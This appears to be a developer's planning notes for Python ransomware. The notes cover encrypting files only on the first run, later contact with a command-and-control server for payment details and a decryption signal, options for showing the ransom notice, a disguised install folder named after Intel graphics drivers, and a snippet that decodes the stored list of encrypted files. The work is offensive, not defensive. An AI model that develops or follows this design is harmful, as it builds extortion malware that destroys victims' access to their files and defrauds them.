Implement first run.
Only encrypt files on first run of script.
Any consequent runs (e.g. those executed by startup script) will only be used to communicate with server,
allow the user to see details to pay, and to receive signal (from C&C Center) to decrypt files on payment.

Implement comments on FS Operations defs.












Maximum file size, so that program does not stall processing one multi-gigabyte file

Processors.py
Implement generic byte encryption decryption functions

GUI Ransom notification options
    GUI Framework (QT / html / Gtk)
        - Requires additional files to be downloaded by the script from C&C server
        - Takes time and resources to download
        - Extravagant for basic ransom notification
    Python web server hosted by client
        - Requires additional files to be downloaded by the script from C&C server
        - Takes time and resources to download
        - Requires firewall permission to listen to internal port (identifying publisher info)
    Navigation to web page on C&C Python Server
        - Does not require additional files to be downloaded
        - No extra permission needed
        - Allows for changes without communication with client through script



Reverting changes:
    Delete C:\Intel Graphics Drivers
    Delete C:\"\files.list
    Decrypt previously encrypted files

Encrypt Encrypted files list after encrypting targeted files




"""
    Interprets the line by line base64 encoded "encrypted files" list into strings
"""
        with io.open(crwa_configdir + "\\files.list", "r") as f:
            for line in f.readlines():
                l(base64.b64decode(line).decode('utf-8'))